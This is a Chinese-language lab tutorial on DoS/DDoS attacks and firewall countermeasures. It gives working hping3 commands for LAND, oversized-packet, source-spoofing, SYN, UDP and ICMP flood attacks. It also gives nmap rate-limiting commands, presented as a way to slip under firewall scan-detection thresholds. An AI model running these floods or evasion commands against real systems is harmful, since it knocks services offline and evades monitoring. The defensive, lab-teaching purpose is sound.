DDOS攻击与防范

DDOS攻击
攻击：使用kali的hping3工具和nmap工具进行模拟攻击
防御：使用防火墙进行防御

#单包攻击和防御
        单包攻击是常见的DOS(拒绝服务攻击)[单一类型的包达到一定数量称为单包攻击]
#常见的单包攻击
*扫描类攻击
        攻击之前的网络探测行为

*畸形报文攻击
发送大量有缺陷的报文,被攻击方系统处理时耗费大量的时间来处理这类报文。导致系统耗费资源或崩溃

*特殊控制类报文攻击
主要是探测网络结构的(tracert).可以做信息收集

#扫描类攻击与防御：
ip地址扫描/端口扫描
判断每个源IP地址发送的报文端口与前一个报文的端口不同记一次异常
当异常次数超过预定义的值,则认为源IP正在进行扫描攻击并拉入黑名单

防御：
在防火墙中策略的攻击防范进行单包攻击防御
查看防火墙日志进行查看

思路:减少发包的速率/降低扫描的速度
绕过防火墙限制:nmap --max-rate n :n为每秒发包数量,如果此数量在防火墙的限制的发包数量以内,则能绕过防火墙限制
nmap -sP 网段/子网掩码  --max-rate 10
nmap -sS ip地址  --max-rate 10

#畸形报文之LAND攻击
LAND攻击方式
采用了特别构造的TCP SYN数据包.
攻击者伪造一个源地址和目的地址均为被攻击者IP地址的空连接,持续的进行自我应答,消耗系统资源直至崩溃

hping3 目标IP地址 -p 45 -S -a 目标IP地址  --flood
-p 指定端口
-S 发送SYN报文 同--SYN
-a 伪造源地址
--flood 泛洪

防御：
开启防火墙的“畸形报文攻击防范”，勾选 LAND

#畸形报文之"泪滴攻击"
泪滴攻击方式
攻击者向目标主机发送损坏的数据包(比如超大的数据包),消耗主机资源

hping3 目标IP地址 -p 445 -S -d 666666 --flood
-p 指定端口
-d 指定数据包大小

防御：开启防火墙的“畸形报文攻击防范”，勾选 "Tear droop"

#畸形报文之"IP欺骗攻击"
IP欺骗攻击
攻击者向目标主机发送大量的伪造源IP地址的数据包,使目标主机无法追溯从而消耗其资源

hping3 目标IP地址 -p 445 -S --rand-source --flood
-p 指定目标端口
-S 请求包  = --syn
--rand-source  伪造随机大量的源IP地址

防御：
开启防火墙的“畸形报文攻击防范”，勾选 “IP欺骗攻击防范”

#流量攻击和防御
流量攻击一般指DDoS (分布式拒绝服务攻击)
包括 "SYN Flood"、"UDP Flood"、"ICMP Flood"、"DNS Flood"、"HTTP Flood"攻击

#1.SYN Flood 攻击和防御
攻击者利用僵尸网络(大量的肉鸡) 向攻击目标发送大量的SYN 半连接报文,消耗目标主机资源
一台攻击不明显,同时控制多台肉鸡比较明显.

hping3 目标IP地址 -S -p 80 --rand-source --flood

防御：
设置防御模式“清洗”,监控外网接口G1/0/1
启用SYN Flood源探测,设置阈值20(阈值可以配置防火墙自动学习)

#2.UDP Flood攻击和防御
攻击者利用UDP面向无连接尽快处理数据包的特性,发送大量的UDP数据包供目标主机处理,以消耗目标主机资源

hping3 目标IP地址 --udp -p 80 --rand-source --Flood

防御:
启用UDP Flood限流,设置阈值5 Mbps和指纹学习同时使用。
UDP Flood攻击有可能把防火墙打瘫,需要重启防火墙外网接口

#3.ICMP Flood 攻击和防御
攻击者发送大量的ping包,以消耗目标主机资源

hping3 目标IP地址 --icmp -p 80 --rand-source --flood

防御:
启用ICMP Flood限流,设置阈值5 Mbps

##在虚拟环境进行，不要在真实环境中实验。